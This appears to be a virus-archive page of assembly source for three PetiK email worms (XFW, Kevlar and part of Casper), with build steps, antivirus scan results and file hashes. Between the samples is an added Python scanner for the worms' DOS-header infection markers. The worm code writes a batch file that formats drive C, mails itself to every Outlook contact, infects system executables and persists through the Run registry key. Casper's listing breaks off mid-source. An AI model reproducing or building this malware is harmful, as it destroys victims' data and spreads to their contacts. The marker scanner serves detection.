push 20h
push 02h
push 00h
push 01h
push 40000000h
@pushsz "C:\Autoexec.bat"
callx CreateFileA
mov edi,eax
push 00h
push offset octets
push BATSIZE
push offset batd
push edi
callx WriteFile
push edi
callx CloseHandle
popad
jmp FIN

INET: @pushsz "WININET.dll"


callx LoadLibraryA
test eax,eax
jz FIN
mov WNEThdl,eax
@pushsz "InternetCheckConnectionA"
push WNEThdl
callx GetProcAddress
test eax,eax
jz FIN
mov netcheck,eax
VNET: xor eax,eax
push eax
push eax
push eax
call [netcheck]
xchg eax,ecx
jecxz VNET
FNET: push [WNEThdl]
callx FreeLibrary

push 40h
@pushsz "Internet"
@pushsz "You're connected"
push 00h
callx MessageBoxA

VBS: pushad
push 00h
push 80h
push 02h
push 00h
push 01h
push 40000000h
@pushsz "C:\Win.vbs"
callx CreateFileA
mov edi,eax
push 00h
push offset octets2
push VBSSIZE
push offset vbsd
push edi
callx WriteFile
push edi
callx CloseHandle
popad
push 01h
@pushsz "wscript C:\Win.vbs"
callx WinExec
push 30 * 1000
@pushsz "C:\Win.vbs"
callx DeleteFileA

FIN: push 00h


callx ExitProcess

.data
; ========== INSTALLATION ==========
a_wsck db 50 dup (0)
n_wsck db 50 dup (0)
szCopie db 50 dup (0)
szOrig db 50 dup (0)
Winini db 50 dup (0)
windir db 50 dup (0)
octets dd ?
; ============ INFECTION 1 ===========
WsckHdl dd ?
filesize dd ?
WsckMap dd ?
WsckView dd ?
; ============ INFECTION 2 ===========
htmlHdl dd ?
szCurFolder db 50 dup (0)

; =============== EMail ==============


RegHandle dd ?
Page db 7Fh dup (0)
PageSize dd 7Fh
ValueType dd 0
WNEThdl dd ?
netcheck dd ?
octets2 dd ?

WormName db "I-Worm.XFW coded by PetiK (c)2001 "


Origine db "Made In France",00h

txtd db "To restore Wsock32.dll :",13,10


db "extract /a D:\WIN98\precopy1.cab wsock32.dll /L C:\WINDOWS\SYSTEM",00h
TXTSIZE equ $-txtd

batd db "echo y | format c: /U /V:FuckYou"


BATSIZE equ $-batd

SYSTIME struct
wYear WORD ?
wMonth WORD ?
wDayOfWeek WORD ?
wDay WORD ?
wHour WORD ?
wMinute WORD ?
wSecond WORD ?
wMillisecond WORD ?
SYSTIME ends

MAX_PATH equ 260


FILETIME struct
dwLowDateTime dd ?
dwHighDateTime dd ?
FILETIME ends
WIN32_FIND_DATA struct
dwFileAttributes dd ?
ftCreationTime FILETIME ?
ftLastAccessTime FILETIME ?
ftLastWriteTime FILETIME ?
nFileSizeHigh dd ?
nFileSizeLow dd ?
dwReserved0 dd ?
dwReserved1 dd ?
cFileName dd MAX_PATH (?)
cAlternateFileName db 13 dup (?)
db 3 dup (?)
WIN32_FIND_DATA ends

SystemTime SYSTIME <>


Search WIN32_FIND_DATA <>
vbsd:
db 'Set K = CreateObject("Outlook.Application")',0dh,0ah
db 'Set L = K.GetNameSpace("MAPI")',0dh,0ah
db 'For Each M In L.AddressLists',0dh,0ah
db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah
db 'For O = 1 To M.AddressEntries.Count',0dh,0ah
db 'Set P = M.AddressEntries(O)',0dh,0ah
db 'Set N = K.CreateItem(0)',0dh,0ah
db 'N.To = P.Address',0dh,0ah
db 'N.Subject = "Xtra game for you"',0dh,0ah
db 'N.Body = "This is for you"',0dh,0ah
db 'Set Q = CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'N.Attachments.Add Q.BuildPath(Q.GetSpecialFolder(1),"Services.exe")',0dh,0ah
db 'N.DeleteAfterSubmit = True',0dh,0ah
db 'If N.To <> "" Then',0dh,0ah
db 'N.Send',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
VBSSIZE equ $-vbsd

end DEBUT
end
File XFW.exe received on 05.16.2009 20:03:58 (CET)

Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 VBS.Lee.Based!IK
AhnLab-V3 5.0.0.2 2009.05.16 Win32/PetTick.5632
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.D1
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.16 W32/Malware!e65e
Avast 4.8.1335.0 2009.05.15 Win32:XFW
AVG 8.5.0.336 2009.05.15 I-Worm/Petik
BitDefender 7.2 2009.05.16 Generic.Malware.Msp!.D18236D7
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.16 Worm.Petik.D2
Comodo 1157 2009.05.08 Worm.Win32.Petik.AB
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.8192
eSafe 7.0.17.0 2009.05.14 Suspicious File
eTrust-Vet 31.6.6508 2009.05.16 Win32/Petik.5632.C!intended
F-Prot 4.4.4.56 2009.05.16 W32/Malware!e65e
F-Secure 8.0.14470.0 2009.05.16 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 W32/Petik!worm
GData 19 2009.05.16 Generic.Malware.Msp!.D18236D7
Ikarus T3.1.1.49.0 2009.05.16 VBS.Lee.Based
K7AntiVirus 7.10.737 2009.05.16 Email-Worm.Win32.Petik
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
McAfee 5616 2009.05.15 W32/PetTick@MM
McAfee+Artemis 5616 2009.05.15 Artemis!CA27691BF213
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.D1
Microsoft 1.4602 2009.05.16 Worm:Win32/Pet_tik.F
NOD32 4080 2009.05.15 Win32/Petik.AB
Norman 6.01.05 2009.05.16 W32/Petik.AC
nProtect 2009.1.8.0 2009.05.16 Worm/W32.Petik.5632
Panda 10.0.0.14 2009.05.16 W32/Petik.D
PCTools 4.4.2.0 2009.05.16 I-Worm.Petxfw.A
Prevx 3.0 2009.05.16 Medium Risk Malware
Rising 21.29.52.00 2009.05.16 Worm.XFW
Sophos 4.41.0 2009.05.16 W32/XfW
Sunbelt 3.2.1858.2 2009.05.16 Worm.Petik
Symantec 1.4.4.12 2009.05.16 W95.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 WORM_PETIK.F
VBA32 3.12.10.5 2009.05.16 Win32.Worm.Petik.8192
ViRobot 2009.5.15.1737 2009.05.15 I-Worm.Win32.PetTick.5632
VirusBuster 4.6.5.0 2009.05.16 I-Worm.Petxfw.A

Additional information
File size: 5632 bytes
MD5...: ca27691bf2137dc610588dd9f09de3b2
SHA1..: 5b1aac1f8783d4123f3b88c213bc8321dc8d6a4a
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
comment #
Name : I-Worm.Kevlar
Author : PetiK
Date : August 7th - August 16th
Language : ASM
Size : 5120 bytes
Action : Copies itself to %System%\Kevlar32.exe (hidden attribute)
and %System%\MScfg32.exe (normal attribute).
Adds HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Kevlar32 = %System%\Kevlar32.exe

* Infects %Windir%\C???????.exe files by writing "PetiK" in the file
* Infects %Windir%\*.exe: it adds .htm and creates a new file with ActiveX
* Creates C:\__.vbs. This file takes all addresses in the Address Book and saves them in
%windir%\AddBook.txt. The worm scans this file to find the addresses and sends a new mail:

Subject : Windows Protect !!

Body : The smallest software to stop your computer to bug in each time.
I have found this program on WWW.KEVLAR-PROTECT.COM
Take a look at the attchment.

Bye and have a nice day.

Attachment : MScfg32.exe

* It creates %windir%\MSinfo32.txt. It looks like this :

[File Infected] => Name of the C???????.exe file infected
CLEANMGR.EXE=Infected by W32.Kevlar.PetiK
CVTAPLOG.EXE=Infected by W32.Kevlar.PetiK

[EMail saved] => Some addresses found in the address book
first@mail.com=Next victim
second@mail.com=Next victim

To build the worm:
tasm32 /M /ML Kevlar
tlink32 -Tpe -aa -x Kevlar,,,import32
upx -9 Kevlar.exe

To delete the worm:
@echo off
del %windir%\system\Kevlar32.exe
del %windir%\system\MScfg32.exe
del %windir%\*.exe.htm
del %windir%\MSinfo32.txt
del %windir%\AddBook.txt
#
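The "PetiK" stamp that XFW and Kevlar write into the DOS header at offset 12h (and test before re-infecting) is a usable infection marker for a defender. Below is an added Python scanner, not PetiK's code and not part of the archive, that checks PE files for that marker and for the Happy99 ("z" at 12h) and Icecubes ("ll" at 38h) markers that Casper's Check_Wsock routine further down this page tests for; the offsets and bytes come from the sources on this page, and the minimal MZ/PE header used for the self-test is constructed.

```python
"""Scan PE files for the DOS-header infection markers described on this page.

Added example: XFW and Kevlar stamp "PetiK" at offset 0x12 of the DOS header
of WSOCK32.DLL / C???????.exe and test that byte before re-infecting; Casper
checks the same header for the Happy99 and Icecubes markers. A defender can
scan for the same bytes. Marker offsets and values are taken from the sources.
"""
import struct
import sys
from pathlib import Path

# (name, offset into the file, expected bytes), from the page's sources.
MARKERS = [
    ("I-Worm.XFW / I-Worm.Kevlar (PetiK)", 0x12, b"PetiK"),
    ("I-Worm.Happy (as checked by Casper)", 0x12, b"z"),
    ("I-Worm.Icecubes (as checked by Casper)", 0x38, b"ll"),
]


def is_pe(data: bytes) -> bool:
    """True if data starts with a DOS header whose e_lfanew points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return e_lfanew + 4 <= len(data) and data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def find_markers(data: bytes) -> list:
    """Return the names of every marker whose bytes are present in a PE image."""
    if not is_pe(data):
        return []
    return [name for name, off, sig in MARKERS if data[off:off + len(sig)] == sig]


def scan_paths(paths):
    """Yield (path, [marker names]) for each readable file that carries a marker."""
    for p in paths:
        try:
            hits = find_markers(Path(p).read_bytes())
        except OSError:
            continue
        if hits:
            yield str(p), hits


def build_stub(marker=None) -> bytes:
    """Constructed minimal MZ/PE header for the self-test (not a real file).

    The bytes at 0x12..0x17 are e_csum/e_ip/e_cs of the DOS stub, which the
    Win32 loader ignores; that is why the worm's stamp leaves the host runnable.
    """
    buf = bytearray(0x100)
    buf[0:2] = b"MZ"
    struct.pack_into("<H", buf, 0x18, 0x40)   # e_lfarlc: the '@' Kevlar checks
    struct.pack_into("<I", buf, 0x3C, 0x80)   # e_lfanew: PE header at 0x80
    buf[0x80:0x84] = b"PE\x00\x00"
    if marker:
        off, sig = marker
        buf[off:off + len(sig)] = sig
    return bytes(buf)


if __name__ == "__main__":
    # Usage: python scan_markers.py C:\WINDOWS\SYSTEM\WSOCK32.DLL C:\WINDOWS\C*.EXE
    for path, hits in scan_paths(sys.argv[1:]):
        print(f"{path}: {', '.join(hits)}")
```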

.586p
.model flat
.code
JUMPS

callx macro a
extrn a:proc
call a
endm

include useful.inc
DEBUT:
F_NAME: push 50
mov esi,offset Orig
push esi
push 0
callx GetModuleFileNameA

mov edi,offset CopyName2


push edi
push 50
push edi
callx GetSystemDirectoryA
add edi,eax
mov eax,'cSM\'
stosd
mov eax,'23gf'
stosd
mov eax,'exe.'
stosd
pop edi
push 0
push edi
push esi
callx CopyFileA

mov edi,offset CopyName


push edi
push 50
push edi
callx GetSystemDirectoryA
add edi,eax
mov al,'\'
stosb
mov eax,'lveK'
stosd
mov eax,'23ra'
stosd
mov eax,'exe.'
stosd
pop edi

push esi
callx GetFileAttributesA
cmp eax,1
je SUITE

push 0
push edi
push esi
callx CopyFileA

push 01h
push edi
callx SetFileAttributesA

REG: pushad
@pushsz "SHLWAPI.dll"
callx LoadLibraryA
test eax,eax
jz FIN
mov edi,eax
@pushsz "SHSetValueA"
push edi
callx GetProcAddress
test eax,eax
jz FIN
mov esi,eax
push 08h
push offset CopyName
push 01h
@pushsz "Kevlar32"
@pushsz "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
push 80000002h
call esi
push edi
callx FreeLibrary
popad

call Nick
mov edi,offset nickname
push 40h
@pushsz "Hello, my name is :"
push edi
push 0
callx MessageBoxA

call Infect
jmp FIN

SUITE: call Infect2


VB_F: pushad
push 00h
push 80h
push 02h
push 00h
push 01h
push 40000000h
@pushsz "C:\__.vbs"
callx CreateFileA
test eax,eax
xchg edi,eax
push 00h
push offset octets
push VBSSIZE
push offset vbsd
push edi
callx WriteFile
push edi
callx CloseHandle
popad
push 1
@pushsz "wscript C:\__.vbs"
callx WinExec
push 10000
callx Sleep
@pushsz "C:\__.vbs"
callx DeleteFileA

SCAN1: mov edi,offset addbook


push edi
push 50
push edi
callx GetWindowsDirectoryA
add edi,eax
mov eax,"ddA\"
stosd
mov eax,"kooB"
stosd
mov eax,"txt."
stosd
xor eax,eax
stosd
call OPEN

FIN: push 00h


callx ExitProcess

Nick Proc
mov edi,offset nickname
callx GetTickCount
push 9
pop ecx
xor edx,edx
div ecx
inc edx
mov ecx,edx
name_g:
push ecx
callx GetTickCount
push 'Z'-'A'
pop ecx
xor edx,edx
div ecx
xchg eax,edx
add al,'A'
stosb
callx GetTickCount
push 100
pop ecx
xor edx,edx
div ecx
push edx
callx Sleep
pop ecx
loop name_g
ret
Nick EndP

Infect Proc
pushad
push 50
push offset WinPath
callx GetWindowsDirectoryA
push offset WinPath
callx SetCurrentDirectoryA
FFF:
push offset Search
@pushsz "C???????.exe"
callx FindFirstFileA
inc eax
je F_INF
dec eax
mov [exeHdl],eax
I_FILE:
mov verif,0
xor eax,eax
push eax
push eax
push 03h
push eax
push eax
push 80000000h or 40000000h
push offset Search.cFileName
callx CreateFileA
inc eax
jz FNF
dec eax
xchg eax,ebx

xor eax,eax
push eax
push eax
push eax
push 04h
push eax
push ebx
callx CreateFileMappingA
test eax,eax
jz CL1
xchg eax,ebp

xor eax,eax
push eax
push eax
push eax
push 06h
push ebp
callx MapViewOfFile
test eax,eax
jz CL2
xchg eax,edi
mov esi,eax
cmp word ptr [esi],"ZM"
jne CL2
cmp byte ptr [esi+18h],"@"
jne CL2
cmp word ptr [esi+80h],"EP"
jne CL2
cmp byte ptr [esi+12h],"P"
je CL2
mov word ptr [esi+12h],"eP"
mov word ptr [esi+14h],"it"
mov byte ptr [esi+16h],"K"
inc verif
push edi
callx UnmapViewOfFile
CL2:
push ebp
callx CloseHandle
CL1:
push ebx
callx CloseHandle

cmp verif,1
jne FNF
mov edi,offset InfoFile
push edi
push 50
push edi
callx GetWindowsDirectoryA
add edi,eax
mov eax,'iSM\'
stosd
mov eax,'3ofn'
stosd
mov eax,'xt.2'
stosd
mov al,'t'
stosb
pop edi
mov esi,edi
push esi
@pushsz "Infected by W32.Kevlar.PetiK"
push offset Search.cFileName
@pushsz "File Infected"
callx WritePrivateProfileStringA

FNF:
push offset Search
push [exeHdl]
callx FindNextFileA
test eax,eax
jne I_FILE
FC:
push [exeHdl]
callx FindClose
F_INF:
popad
ret
Infect EndP

Infect2 Proc
pushad
push 50
push offset WinPath
callx GetWindowsDirectoryA
push offset WinPath
callx SetCurrentDirectoryA
FFF2:
push offset Search
@pushsz "*.exe"
callx FindFirstFileA
inc eax
je F_INF2
dec eax
mov [exeHdl],eax
I_FILE2:
pushad
mov edi,offset Search.cFileName
push edi
callx lstrlen
add edi,eax
mov eax,"mth."
stosd
xor eax,eax
stosd
push 00h
push 80h
push 02h
push 00h
push 01h
push 40000000h
push offset Search.cFileName
callx CreateFileA
test eax,eax
xchg ebp,eax
push 00h
push offset octets
push HTMSIZE
push offset htmd
push ebp
callx WriteFile
push ebp
callx CloseHandle
popad
FNF2:
push offset Search
push [exeHdl]
callx FindNextFileA
test eax,eax
jne I_FILE2
FC2:
push [exeHdl]
callx FindClose
F_INF2:
popad
ret
Infect2 EndP

OPEN: pushad
push 00h
push 80h
push 03h
push 00h
push 01h
push 80000000h
push offset addbook
callx CreateFileA
inc eax
je NO
dec eax
xchg eax,ebx

xor eax,eax
push eax
push eax
push eax
push 02h
push eax
push ebx
callx CreateFileMappingA
test eax,eax
je F1
xchg eax,ebp

xor eax,eax
push eax
push eax
push eax
push 04h
push ebp
callx MapViewOfFile
test eax,eax
je F2
xchg eax,esi

push 00h
push ebx
callx GetFileSize
cmp eax,03h
jbe F3 ; is the file empty ??

call SCAN

F3: push esi


callx UnmapViewOfFile
F2: push ebp
callx CloseHandle
F1: push ebx
callx CloseHandle
NO: popad
ret

SCAN:
pushad
xor edx,edx
mov edi,offset m_addr
push edi
p_c: lodsb
cmp al," "
je car_s
cmp al,0dh
je entr1
cmp al,0ah
je entr2
cmp al,"!"
je f_mail
cmp al,"@"
je not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
entr1: xor al,al
stosb
pop edi
test edx,edx
je SCAN
call SEND_MAIL
jmp SCAN
entr2: xor al,al
stosb
pop edi
jmp SCAN
f_mail: popad
ret
SEND_MAIL:
push 50
push offset save_addr
callx GetWindowsDirectoryA
@pushsz "\MSinfo32.txt"
push offset save_addr
callx lstrcat
push offset save_addr
@pushsz "Next victim"
push offset m_addr
@pushsz "EMail saved"
callx WritePrivateProfileStringA
xor eax,eax
push eax
push eax
push offset Message
push eax
push [MAPIHdl]
callx MAPISendMail
ret

.data
; ===== INSTALLATION =====
Orig db 50 dup (0)
CopyName db 50 dup (0)
CopyName2 db 50 dup (0)
nickname db 11 dup (?)
; ===== INFECTION =====
InfoFile db 50 dup (0)
WinPath db 50 dup (0)
exeHdl dd ?
verif dd ?
octets dd ?

; ===== MAIL =====


addbook db 50 dup (0)
save_addr db 50 dup (0)
m_addr db 128 dup (?)
MAPIHdl dd 0
subject db "Windows Protect !!",00h
body db "The smallest software to stop your computer to bug in each time.",0dh,0ah
db "I have found this program on WWW.KEVLAR-PROTECT.COM",0dh,0ah,0dh,0ah
db "Take a look at the attchment.",0dh,0ah,0dh,0ah
db 09h,09h,"Bye and have a nice day.",00h
NameFrom db "Your friend",00h

Message dd ?
dd offset subject
dd offset body
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgTo
dd 1
dd offset Attach

MsgFrom dd ?
dd ?
dd NameFrom
dd ?
dd ?
dd ?

MsgTo dd ?
dd 1
dd offset m_addr
dd offset m_addr
dd ?
dd ?

Attach dd ?
dd ?
dd ?
dd offset CopyName2
dd ?
dd ?

htmd:
db '<html><head><title>PetiKVX come back</title></head><body>',0dh,0ah
db '<script language=vbscript>',0dh,0ah
db 'on error resume next',0dh,0ah
db 'set fso=createobject("scripting.filesystemobject")',0dh,0ah
db 'If err.number=429 then',0dh,0ah
db 'document.write "<font face=''verdana'' size=''2'' color=''#FF0000''>'
db 'You need ActiveX enabled to see this file<br><a
href=''javascript:location.reload()''>'
db 'Click Here</a> to reload and click Yes</font>"',0dh,0ah
db 'Else',0dh,0ah
db 'Set ws=CreateObject("WScript.Shell")',0dh,0ah
db 'document.write "<font face=''verdana'' size=''3'' color=red>'
db 'This page is generate by a worm<br>But this worm is proteced by
Kevlar<br></font>"',0dh,0ah
db 'document.write "<font face=''verdana'' size=''2'' color=blue><br>'
db 'Worms are not dangerous for your computer but to survive, they must be
strong</font>"',0dh,0ah
db 'ws.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.avp.ch"',0dh,0ah
db 'End If',0dh,0ah
db '</script></html>',00h
HTMSIZE = $-htmd

vbsd:
db 'On Error Resume Next',0dh,0ah
db 'Set Kevlar = CreateObject("Outlook.Application")',0dh,0ah
db 'Set L = Kevlar.GetNameSpace("MAPI")',0dh,0ah
db 'Set f=CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'Set c=f.CreateTextFile(f.GetSpecialFolder(0)&"\AddBook.txt")',0dh,0ah
db 'c.Close',0dh,0ah
db 'For Each M In L.AddressLists',0dh,0ah
db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah
db 'For O = 1 To M.AddressEntries.Count',0dh,0ah
db 'Set P = M.AddressEntries(O)',0dh,0ah
db 'Set c=f.OpenTextFile(f.GetSpecialFolder(0)&"\AddBook.txt",8,true)',0dh,0ah
db 'c.WriteLine P.Address',0dh,0ah
db 'c.Close',0dh,0ah
db 'Next',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'Set c=f.OpenTextFile(f.GetSpecialFolder(0)&"\AddBook.txt",8,true)',0dh,0ah
db 'c.WriteLine "!"',0dh,0ah
db 'c.Close',0dh,0ah
VBSSIZE = $-vbsd

signature db "I-Worm.Kevlar coded by PetiK (c)2001",00h

MAX_PATH equ 260


FILETIME struct
dwLowDateTime dd ?
dwHighDateTime dd ?
FILETIME ends
WIN32_FIND_DATA struct
dwFileAttributes dd ?
ftCreationTime FILETIME ?
ftLastAccessTime FILETIME ?
ftLastWriteTime FILETIME ?
nFileSizeHigh dd ?
nFileSizeLow dd ?
dwReserved0 dd ?
dwReserved1 dd ?
cFileName dd MAX_PATH (?)
cAlternateFileName db 13 dup (?)
db 3 dup (?)
WIN32_FIND_DATA ends

Search WIN32_FIND_DATA <>

end DEBUT
end
File Kevlar.exe received on 05.16.2009 17:43:00 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.16 Win32/PetTick.5120
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.Kev
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.16 W32/Malware!c6f1
Avast 4.8.1335.0 2009.05.15 Win32:Kevlar
AVG 8.5.0.336 2009.05.15 I-Worm/Petik.H
BitDefender 7.2 2009.05.16 Generic.Malware.GSMsp!.411C2399
CAT-QuickHeal 10.00 2009.05.15 W32.Petik
ClamAV 0.94.1 2009.05.16 Win32.Pet_Tick.M
Comodo 1157 2009.05.08 Worm.Win32.Petik.L
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.8192
eSafe 7.0.17.0 2009.05.14 Suspicious File
eTrust-Vet 31.6.6508 2009.05.16 Win32/Kevlar
F-Prot 4.4.4.56 2009.05.16 W32/Malware!c6f1
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 JS/KEVLAR.A
GData 19 2009.05.16 Generic.Malware.GSMsp!.411C2399
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Petik
K7AntiVirus 7.10.737 2009.05.16 Email-Worm.Win32.Petik
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
McAfee 5616 2009.05.15 W32/PetTick@MM
McAfee+Artemis 5616 2009.05.15 Artemis!95EC22B0B688
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.Kev
Microsoft 1.4602 2009.05.16 Worm:Win32/Petick.M@mm
NOD32 4080 2009.05.15 Win32/Petik.L
Norman 6.01.05 2009.05.16 W32/Pet_Tick.5120
nProtect 2009.1.8.0 2009.05.16 -
Panda 10.0.0.14 2009.05.16 W32/Petik.C
PCTools 4.4.2.0 2009.05.16 I-Worm.Petik.I1
Prevx 3.0 2009.05.16 Medium Risk Malware
Rising 21.29.52.00 2009.05.16 Trojan.Petik
Sophos 4.41.0 2009.05.16 W32/Kevlar
Sunbelt 3.2.1858.2 2009.05.16 Worm.Petik
Symantec 1.4.4.12 2009.05.16 W32.Pet_Tick.M
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 WORM_PET.TICK.M
VBA32 3.12.10.5 2009.05.16 Win32.Worm.Petik.8192
ViRobot 2009.5.15.1737 2009.05.15 I-Worm.Win32.Petik.5120
VirusBuster 4.6.5.0 2009.05.16 I-Worm.Petik.I1

Additional information
File size: 5120 bytes
MD5...: 95ec22b0b68815a9bf6def95e5c3b9b1
SHA1..: 00dbadea4b400e6e0ae58951d063a4943fd1fc8d
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
comment #
Name : I-Worm.Casper
Author : PetiK
Date : August 17th - August 24th
Size : 6144 bytes (compressed with UPX tool)

Action : Copies itself to
* WINDOWS\MsWinsock32.exe
Adds in the key HKLM\Software\Microsoft\Windows\CurrentVersion\Run the value
* Winsock32 1.0 = WINDOWS\MsWinsock32.exe

To build the worm:
tasm32 /ml /m9 Casper
tlink32 -Tpe -c -x -aa Casper,,,import32,dllz
upx -9 Casper.exe

To delete the worm:
del %windir%\MsWinsock32.exe
del %windir%\CasperEMail.txt

dllz.def file:
IMPORTS
WININET.InternetGetConnectedState
SHLWAPI.SHSetValueA

.586p
.model flat
.code

JUMPS

callx macro a
extrn a:proc
call a
endm

include useful.inc

DEBUT:
Main_Worm:

call Hide_Worm
call Copy_Worm
call Check_Wsock
call Prepare_Spread_Worm

Connected_:
push 00h
push offset Tmp
callx InternetGetConnectedState
dec eax
jnz Connected_
mov edi,offset casper_mail
push edi
push 50
push edi
callx GetWindowsDirectoryA
add edi,eax
mov eax,"saC\"
stosd
mov eax,"Erep"
stosd
mov eax,"liaM"
stosd
mov eax,"txt."
stosd
xor eax,eax
stosd

call Spread_Worm

Hide_Worm proc
pushad
@pushsz "Kernel32.dll"
callx GetModuleHandleA
xchg eax,ecx
jecxz End_Hide
@pushsz "RegisterServiceProcess"
push ecx
callx GetProcAddress
xchg eax,ecx
jecxz End_Hide
push 1
push 0
call ecx
End_Hide:
popad
ret
Hide_Worm endp

Check_Wsock proc
Search_Wsock:
push 50
mov edi,offset wsock_file
push edi
callx GetSystemDirectoryA
add edi,eax
mov eax,"osW\"
stosd
mov eax,"23kc"
stosd
mov eax,"lld."
stosd
xor eax,eax
stosd

push offset wsock_file


callx GetFileAttributesA
cmp eax,20h
jne End_Wsock

xor eax,eax
push eax
push eax
push 03h
push eax
push eax
push 80000000h or 40000000h
push offset wsock_file
callx CreateFileA
mov wsckhdl,eax

File_Mapping:
xor eax,eax
push eax
push eax
push eax
push 04h
push eax
push wsckhdl
callx CreateFileMappingA
test eax,eax
jz Close_File
mov wsckmap,eax

xor eax,eax
push eax
push eax
push eax
push 06h
push wsckmap
callx MapViewOfFile
test eax,eax
jz Close_Map_File
mov esi,eax
mov wsckview,eax

Old_Infect:
mov verif,0
cmp word ptr [esi],"ZM"
jne UnmapView_File
cmp byte ptr [esi+12h],"z"
je Infected_By_Happy
cmp word ptr [esi+38h],"ll"
je Infected_By_Icecubes
jmp UnmapView_File

Infected_By_Happy:
push 10h
push offset warning
@pushsz "I-Worm.Happy coded by Spanska"
push 00h
callx MessageBoxA
inc verif
jmp UnmapViewOfFile
Infected_By_Icecubes:
push 10h
push offset warning
@pushsz "I-Worm.Icecubes coded by f0re"
push 00h
callx MessageBoxA
inc verif
jmp UnmapViewOfFile
Already_Infected:
inc verif
jmp UnmapViewOfFile

UnmapView_File:
push wsckview
callx UnmapViewOfFile
Close_Map_File:
push offset wsckmap
callx CloseHandle
Close_File:
push wsckhdl
callx CloseHandle
End_Wsock:
ret
Check_Wsock endp

Copy_Worm proc
pushad
Original_Name:
push 50
mov esi,offset original
push esi
push 0
callx GetModuleFileNameA
Copy_Name:
mov edi,offset copy_name
push edi
push 50
push edi
callx GetWindowsDirectoryA
add edi,eax
mov eax,'WsM\'
stosd
mov eax,'osni'
stosd
mov eax,'23kc'
stosd
mov eax,'exe.'
stosd
pop edi
push 0
push edi
push esi
callx CopyFileA
Reg_Registered:
push 08h
push edi
push 01h
@pushsz "Winsock32"
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
push 80000002h
callx SHSetValueA
push 08h
@pushsz "PetiK - France - (c)2001"
push 01h
@pushsz "Author"
@pushsz "Software\CasperWorm"
push 80000001h
callx SHSetValueA
push 08h
@pushsz "1.00"
push 01h
@pushsz "Version"
@pushsz "Software\CasperWorm"
push 80000001h
callx SHSetValueA
popad
ret
Copy_Worm endp

Prepare_Spread_Worm proc
pushad
push 00h
push 80h
push 02h
push 00h
push 01h
push 40000000h
@pushsz "C:\CasperMail.vbs"
callx CreateFileA
xchg edi,eax
push 00h
push offset octets
push VBSSIZE
push offset vbsd
push edi
callx WriteFile
push edi
callx CloseHandle
push 1
@pushsz "wscript C:\CasperMail.vbs"
callx WinExec
push 3 * 1000
callx Sleep
@pushsz "C:\CasperMail.vbs"
callx DeleteFileA
popad
ret
Prepare_Spread_Worm endp

Spread_Worm:
pushad
push 00h
push 80h
push 03h
push 00h
push 01h
push 80000000h
push offset casper_mail
callx CreateFileA
inc eax
test eax,eax
je End_Spread_worm
dec eax
xchg eax,ebx

xor eax,eax
push eax
push eax
push eax
push 02h
push eax
push ebx
callx CreateFileMappingA
test eax,eax
je F1
xchg eax,ebp

xor eax,eax
push eax
push eax
push eax
push 04h
push ebp
callx MapViewOfFile
test eax,eax
je F2
xchg eax,esi
push 00h
push ebx
callx GetFileSize
cmp eax,03h
jbe F3

call Scan_Mail

F3: push esi


callx UnmapViewOfFile
F2: push ebp
callx CloseHandle
F1: push ebx
callx CloseHandle
End_Spread_worm:
popad
ret
Scan_Mail:
pushad
xor edx,edx
mov edi,offset m_addr
push edi
p_c: lodsb
cmp al," "
je car_s
cmp al,0dh
je entr1
cmp al,0ah
je entr2
cmp al,"#"
je f_mail
cmp al,"@"
je not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
entr1: xor al,al
stosb
pop edi
test edx,edx
je Scan_Mail
call Send_Mail
jmp Scan_Mail
entr2: xor al,al
stosb
pop edi
jmp Scan_Mail
f_mail:
FIN: push 00h
callx ExitProcess
Send_Mail:
xor eax,eax
push eax
push eax
push eax
push offset Message
push [MAPIHdl]
callx MAPISendMail
ret

.data
; ===== Main_Worm =====
wsock_file db 50 dup (0)
; ===== Check_Wsock =====
wsckhdl dd 0
wsckmap dd 0
wsckview dd 0
PEHeader dd 0
warning db "Warning : You're infected by",00h
verif dd ?

; ===== Copy_Worm =====


original db 50 dup (0)
copy_name db 50 dup (0)
; ===== Prepare_Spread_Worm =====
